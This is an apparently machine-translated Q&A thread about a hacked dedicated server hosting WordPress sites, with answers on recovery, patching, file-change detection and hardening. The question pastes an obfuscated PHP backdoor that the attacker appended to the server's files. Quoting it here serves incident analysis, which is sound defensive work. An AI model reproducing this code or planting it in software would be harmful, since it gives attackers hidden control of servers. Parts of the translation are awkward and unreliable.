wake-up-neo.com

Was soll ich mit gehacktem Server tun?

Mein (verwalteter) dedizierter Server mit mehreren Sites (von denen nicht alle WP verwenden) wurde gehackt.

Verschleierter Code wurde an alle Dateien angehängt (einschließlich WP core/plugin/theme und Nicht-WP-Dateien), deren Inhalt mit einem PHP-Befehl beginnt (und nicht nur an alle Dateien mit einem .php-Suffix).

Es scheint keinen Einfluss auf die gerenderte Seite zu haben, und das Wenige, das ich weiß, deutet darauf hin, dass es sich um eine Hintertür/einen Trojaner handelt - was ungefähr die Grenze meines Wissens ist.

Heute stelle ich fest, dass die Berechtigungen auf 200 geändert wurden - was vermutlich von meinem Dienstanbieter durchgeführt wurde (obwohl ich weder eine Benachrichtigung noch eine Antwort auf meine Frage "Haben Sie ...?" Erhalten habe).

Ich bin gespannt, was der Code leistet, obwohl es sich nicht lohnt, ihn zu dekodieren, da er in gewisser Weise „schlechtes Zeug“ ist.

Ich möchte das Ausmaß des Schadens und die Ursache herausfinden und ein erneutes Auftreten verhindern.

Es ist ziemlich einfach (wenn auch zeitaufwendig), die offensichtlich geänderten Dateien zu ersetzen, und das werde ich tun.

Meine SQL-Datenbank-Backups scheinen "sauber" zu sein - aber ich weiß nicht genug, um sicherzugehen.

Ich gehe vielleicht fälschlicherweise davon aus, dass die Ursache mit WP zusammenhängt, weiß aber nicht, ob es sich stattdessen um das Erraten von Passwörtern oder um eine andere Ursache handelte.

Konstruktive Vorschläge erwünscht. Bitte und danke.

Update: Nachdem nach dem zusätzlichen Code gefragt wurde, wird dieser unten hinzugefügt. Ich habe es ursprünglich nicht aufgenommen, weil es nicht angemessen erschien (es ist den Aufwand der Dekodierung nicht wert, ohne die wahrscheinlich wenig gewonnen werden kann).

$zbdcvsv = 'tj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|w6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>37    x41 107 x45 116 x54"]); if ((strstr($uas,"  x) or (strstr($uas,"    x63 150 x72 157 x6d 145")rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-tvodujpo!   x24-    x24y7   x24-    x24*67]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<h%_6R85,67R37,18R#>q%V<*#fopoV;ho))!gj!<*#cd2bge56+99386    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uft!*uyfu  x27k:!ftmf!}Zqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%-%bT-%hW~%fdy)##-!#~<p3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2^<!Ce*[!%cI<pd%w6Z6<.5`hA   x27pd%66d   163 x69 145")) or (strstr($uas,"    x72 1668M4P8]37]278]225]241]334]368]322]3]364]6]283]427]3w6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*#[k2`as,"  x61 156 x64 162 x6f 151 x64")x65    141 x74 145 x5f 146 x75 1}  x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:745]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%)udfoopdXA    x22)7gj6<*QDU`MPT7-NBx273qj%6<*Y%)fnbozcYufhA   x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x%  x24-    x24*<!~!    x24/%t2w/**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmFSUT`LDPT7-UFOJ`GB)fubfsdtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*127-UVPF8    124 x54 120 x5f 125 x53 105 x52 1#00#W~!%t2w)##Qtjw)#]XA    x27K6<  x7fw6*3qj%7>    x22) or (strstr($uas,"  x66 151 x72 145 x66 157 x78")))9y]g2y]#>>*4-1-bubE{h%)82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7tolower($_SERVER[" x4  x3a 61  x31")) or (strstr($ujyf`x   x22l:!}V;3q%}U;yk5`{66~6<&w6<   x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.f<!  x24-    x24gps)%j>1<%j=tj{fpg)  x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x24Yp { $GLOBALS["  x61 156 x75 156 x61"]=1; $uas=str8:56985:6197g:74985-)% x24-    x24y4   x24-    x24]y8  x24-    <.msv`ftsbqA7>q%6<  x7fw6*  x7f_*#fubfsdX9#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!  x24/%tmw/!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]4b!>!%yy)#}#-#    x24-    x24-tumjgA  x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CW]}R;2]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjutmfV x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)pp5.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>62]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:7592P4]D6#<%G]y6d]281Ld]2x24]26 x24-    x24<%j,,*!| x24-    x24g5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepjepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tut!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X   x24<!%tmw!>!#]y84]275]y8mg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fub24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y234]342]58]24]31#-%tdz*Wsfuvso!%bss    x5csboe))1/3vd}+;!>!}   x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x2sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudo]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  x246767~6<Cw6 $vbpgblb("", $gamgsii); $eutnyme();}}vg   x22)!gj}1~!<2p% x7f!~!<##!>!2p%ZfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/NJU,6<*27-SFGTOBSUOSVUFS,6<*mdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!/20QUUI7jsv%7UFH#   x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-Kmgoj{h1:|:*mmvo:>:iuhofm%:-dovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%t%:osvufs:~:<*9-1-r%)s%>/h%sqpt)%z-#:#*   x24-    x24!>!  x24/%tjw/   x24*b   x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsc^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^72qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    >j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{he(array_map("zkglakb",str_split("%tjw!>!#]y84]275]y83]248 { $vbpgblb = "   x63 162     x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&if((function_exists("  x6f 142 x5f 163 x74 141 x72 164jQeTQcOc/#00#W~!Ydrr)%rsutcvt)fubmgoj{hA!osvufs!~<3,j%2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D]252]y85]256]y6g]257]y86]2%:|:**t%)m%=*h%)m%):fm2bd%-#1GO  x22#)fepmqyjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#4#-#D#-#W#-#C#-#O#-#N#*-!%24- x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x2  x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/ff2-!%t::**<(<!fwbm)%tjw)#   x24#-!#]y38#-!%w:**<")));$eutnyme =osvufs!|ftmf!~<**9.-j%-bubE{h%)1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%de>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#gxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68396]373P6]36]73]83]238M7]381]211Mpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`ms`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!tpqsut>j%!*9!   x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufld56  x63 164 x69 157 x6e"; function zkglakb($n){return chr(ord($n)-1);} 2!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!>!    x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  xK)ebfsX    x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1sv%7-MSV,6<*)ujojR   x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6<*&7-#o]s]o]s]#)fepmqyf    x27*&7-n%)utjm6<    x7f<^2  x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*3]273]y76]277#<!%t2w>#]y74]273]y76%)tpqsut>j%!*72!   x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%):<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%") && (!isset($GLOBALS["   x61 156 x75 156 x61"]))))bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT#0#/*#npd/#)rrd/#00;quui#>.%!<***f   x27,*e  x27,*d  x27,*c  x27,{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f x7f<u%V x27{f;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/}c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUU,;#-#}+;%-qp%)54l}    x27;%!<*#}_;#)323ldfid>}&;!osvufs>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%o:!#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!  x27!hmg%)!gj!|!*1?h%h00#*<%nfd)##Qtpz)#]341][email protected]_reporting(0); $gamgsii = implodStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSgneiijtn'; $rymqhdk=explode(chr((436-316)),substr($zbdcvsv,(39702-33682),(130-96))); $oulclf = $rymqhdk[0]($rymqhdk[(6-5)]); $ezqcuyal = $rymqhdk[0]($rymqhdk[(10-8)]); if (!function_exists('rieqim')) { function rieqim($eebvtvdx, $wgctulke,$hoxaoipzz) { $iopacym = NULL; for($cisysje=0;$cisysje<(sizeof($eebvtvdx)/2);$cisysje++) { $iopacym .= substr($wgctulke, $eebvtvdx[($cisysje*2)],$eebvtvdx[($cisysje*2)+(3-2)]); } return $hoxaoipzz(chr((27-18)),chr((535-443)),$iopacym); }; } $luxvad = explode(chr((164-120)),'3719,53,5370,50,1678,47,1466,21,1251,35,166,47,680,43,1487,28,813,34,213,45,1333,51,3641,24,847,29,4735,70,5982,38,3584,57,2914,58,658,22,5867,36,3665,54,5077,46,69,45,4938,50,4988,25,3153,62,972,32,1161,25,1307,26,3507,36,1004,66,3473,34,5781,45,1776,39,1537,55,2025,56,1186,65,3081,29,5013,64,773,40,4672,63,4466,59,2789,61,4805,67,4227,31,3795,31,3543,41,5196,50,4576,61,5903,53,2568,55,1384,23,2850,64,3010,35,5123,39,3934,21,3045,36,5462,60,3359,55,4525,51,1095,66,501,67,409,23,5634,57,5301,69,432,49,0,69,481,20,5584,50,5691,52,876,61,2623,48,3215,27,2411,49,3110,43,5522,62,2147,40,4322,63,379,30,2460,40,1515,22,2081,66,3242,52,2500,68,5162,34,3886,26,335,44,3294,27,5246,55,3912,22,3955,64,2240,46,5743,38,4872,66,4044,52,1999,26,3321,38,1745,31,2378,33,306,29,1592,30,1070,25,1622,56,589,69,3772,23,4385,50,1815,67,4096,69,1286,21,1407,59,1725,20,258,48,2286,70,114,52,1882,58,3826,60,2356,22,937,35,5420,42,568,21,5956,26,723,50,4435,31,1940,59,2741,48,2187,53,4258,64,5826,41,3414,59,4637,35,2671,70,4019,25,4165,62,2972,38'); $rlojefjp = $oulclf("",rieqim($luxvad,$zbdcvsv,$ezqcuyal)); $oulclf=$zbdcvsv; $rlojefjp(""); $rlojefjp=(658-537); $zbdcvsv=$rlojefjp-1
2
glvr

Mein (verwalteter) dedizierter Server mit mehreren Sites (von denen nicht alle WP verwenden) wurde gehackt.

OK, es passiert. Nicht das Ende der Welt.


Heute stelle ich fest, dass die Berechtigungen auf 200 geändert wurden - was vermutlich von meinem Dienstanbieter durchgeführt wurde (obwohl ich weder eine Benachrichtigung noch eine Antwort auf meine Frage "Haben Sie ...?" Erhalten habe). Möglicherweise hat jemand versucht, Ihren Diensteanbieter anzugreifen. Es ist ziemlich ungewöhnlich, die 200-Benutzer-Berechtigung zu haben.

Unter Linux gibt es zwei Methoden, um die file.php-Berechtigungen zu ändern.

-rwxrwxrwx  file.php
  • Symbolische Methode
  • Absolutwertmethode

Die symbolische Methode ist für Geeks wie David MacKenzie , der das Tool chmod geschrieben hat, und wir werden nur in der Absolutwertmethode sprechen.

Die Erlaubnis der folgenden Datei:

-rwxrwxrwx  file.php

ist 777.

enter image description here

Anscheinend waren Ihre Dateien 200 wie folgt:

--w-------  file.php

4 means Read,
2 means Write
1 means Execute

Sieht so aus, als hätte der Hacker Ihren Root-Zugriff.


Ich bin gespannt, was der Code leistet, obwohl es sich nicht lohnt, ihn zu dekodieren, da er in gewisser Weise „schlechtes Zeug“ ist.

Ich würde mich nicht darum kümmern. Ich würde mich auf die Genesung konzentrieren. Sonst verlieren Sie einfach wertvolle Zeit.


Ich möchte das Ausmaß des Schadens und die Ursache herausfinden und ein erneutes Auftreten verhindern.

Richtig, ich werde mich nur auf die Prävention konzentrieren.

Wenn Ihr Hosting-Anbieter das Feedback nicht bereitstellt, ist dies möglicherweise Ihre Schuld.


Haben Sie die neueste Version von PHP verwendet?

Schauen Sie sich diese URL an und stellen Sie sicher, dass 2016 - 207 Sicherheitslücken in PHP gefunden wurden. http://www.cvedetails.com/product/128/PHP-PHP.html?vendor_id=74

PHP ist auf dem Weg dorthin, aber Sie müssen die Version ständig aktualisieren.


Haben Sie automatische Software-Upgrades verwendet?

Aber nicht nur PHP, Sie müssen automatische Updates für den gesamten Webserver erstellen. Dies ist sehr wichtig.

Gelegentlich gibt es neue Sicherheitslücken für CentOS oder Ubuntu, die Sie ausführen. Und ich war Zeuge einiger großer Probleme, nur weil das Betriebssystem mit Sicherheitsupdates nicht auf dem neuesten Stand war.

In Ubuntu würde man sowas machen

Sudo apt-get update
Sudo unattended-upgrade

irgendwo in cron job, oder

unattended-upgrade --dry-run --debug

So testen Sie das Upgrade.

Wenn Sie Upgrades vornehmen möchten, um als Dienst zu arbeiten, können Sie es versuchen

dpkg-reconfigure unattended-upgrades

Dies müssten Sie in der Regel tun, wenn Ihr Hosting-Unternehmen dies nicht automatisch durchführt. Bitte prüfe.


Haben Sie die Dateiänderungserkennung verwendet?

Ein Teil des iThemes-Sicherheits-Plugins, das Sie bereits verwenden, ist die Erkennung von Dateiänderungen. Dies ist sehr wichtig, da in allen Sicherheitsanalysen erwähnt wird, dass dies ein Schlüsselmerkmal ist. Von dort aus müssen Sie jedoch auf aktualisierte Dateien achten. Es ist wichtig, die Anzahl der Ordner niedrig zu halten und festzulegen, dass Sie nicht über die Erweiterung der Dateien informiert werden. Normalerweise müssen Sie keine Bilder verfolgen.

Hat jemand Ihre Protokolldateien gefunden?

Protokolldateien sollten generell über .htaccess verboten werden. Wenn Sie in Nginx sind, dann in der Nginx-Konfigurationsdatei. Es gibt bestimmte Backup-Plugins, die zum Speichern der Protokolldateien wp-content verwenden. Einige von diesen haben eine schwache Namenskonvention und Pfadfinder erhalten möglicherweise Ihre Protokolle mit den Informationen zu Ihrem Webserver.

Die Erweiterung der Protokolldateien lautet möglicherweise nicht immer ".log". Es kann log.1 und dergleichen sein. Merk dir das.


Kann WP SCAN Ihre Passwörter und Benutzer erkennen

Verwenden Sie WP SCAN Tool und überprüfen Sie, ob es Ihre Passwörter knacken kann.

Sie können die .htaccess-Regel in Betracht ziehen, um die Aufzählung von WordPress-Benutzernamen zu verhindern, wenn Sie keine Nebenwirkungen haben.

RewriteCond %{QUERY_STRING} author=d
RewriteRule ^ /? [L,R=301]

Sind deine Tore weit offen?

Sie können erwägen, Ihren MySQL-Port zu schließen, wenn dieser offen ist.

PORT      STATE   SERVICE
3306/tcp  open    mysql

Einige Dienste wie mysql sollten keine offenen Ports haben, wie im obigen Beispiel. Sie müssen im Internet nach dem richtigen Produkt für den richtigen Portscanner suchen.

Außerdem sollte Ihr Anmeldeformular die Anzahl der Anmeldebeschränkungen sowie die SSH- und FTP-Kanäle Ihres Webservers enthalten.

Das andere Tor ist xmlrpc-php. Wenn Sie dies nicht benötigen, können Sie versuchen, es zu beseitigen , da dies der Ort ist, an dem jemand versuchen könnte, sich anzumelden.


Hattest du eine Firewall .htaccess?

Die sechste Generation der Firewall von der leicht verderblichen Druckmaschine ist überhaupt nicht an Ihre .htaccess-Datei gebunden. https://perishablepress.com/6g/

Es enthält leere Bots und das Entfernen fehlerhafter Bots. Wie ich überprüft habe, sollte es funktionieren, ohne die vorhandenen .htaccess-Regeln zu beeinträchtigen.

Sie sollten dies in verkehrsarmen Zeiten oder auf dem Entwicklungsserver testen und alle Tipps von dort verwenden. Sollte einfach sein, einfach kopieren und einfügen.


Haben Sie RIPS zum Testen Ihrer Plugins und Designs verwendet?

Auf diese Weise können Sie Plugins und Themes Ihrer http(s)://domain.com/rips/index.php scannen.

Sie können es von hier herunterladen und auf die gleiche Ebene wie WordPress extrahieren: enter image description here

Dann probier das mal aus. Das Query Monitor Plugin ist perfekt, aber für das andere Tool wurden Sicherheitsprobleme festgestellt. Ich habe nextgen-gallery und query-monitor Plugins getestet. Schau mal was ich gefunden habe.

enter image description hereenter image description here

Es kann vorkommen, dass Sie mit diesem Tool falsche Positivmeldungen erhalten, aber im Allgemeinen haben Sie das Feedback.


Also der letzte Rat für dich. Sie wissen nicht, ob Ihre MySQL-Datenbank sauber ist. Sie sollten wahrscheinlich alle Artikel mit dem standardmäßigen WordPress-Export exportieren und den neuen erstellen.

Sie sollten neue Plugins und neue Themes installieren. Sie können sogar mit dem neuen sauberen VPS beginnen. Auf Linode sind es nur wenige Klicks.

Sie sollten auf jeden Fall mit der neuen WordPress-Installation beginnen.

Wahrscheinlich können Sie sogar das Hosting ändern, wenn Sie feststellen, dass sie nicht zuverlässig sind.

Der Hosting-Anbieter gibt Ihnen möglicherweise Feedback zu Ihren Webserver-Protokollen, wenn dies der Teil des Dienstes ist, sodass Sie besser verstehen können, wo das Problem liegt.

Trotzdem - Schritt für Schritt.


Bitte überprüfen Sie auch meine andere Antwort , die ich an @Rahul gesendet habe. Dies kann zur Vorbeugung hilfreich sein.

2
prosti

Haben Sie darüber nachgedacht, einen MSSP für Webserver einzurichten?

Was Sie beschreiben, ist nicht ungewöhnlich, wenn Sie überlegen, was Angreifer tun, nachdem sie einen Webserver erfolgreich kompromittiert haben. Ohne die Nutzlast zu sehen, wird es schwierig sein, Ihnen einen wirklich guten Rat in Bezug auf die Nutzlast und deren Funktion zu geben.

Um das volle Ausmaß des Schadens zu verstehen, müssen Sie jedoch eine Forensik für die Box durchführen. Wie viele Daten haben Sie in Form von Protokollen? Haben Sie eine Aufbewahrungsrichtlinie?

Zu Ihrer Information: Die Reinigung wird einfacher sein als die forensische, aber beides sollte machbar sein. Ich stimme auch zu, dass es falsch ist, sofort von WordPress auszugehen. Können Sie weitere Details zu den anderen Anwendungen und Diensten liefern, die auf dem Server ausgeführt werden?

0
Pedro Salazar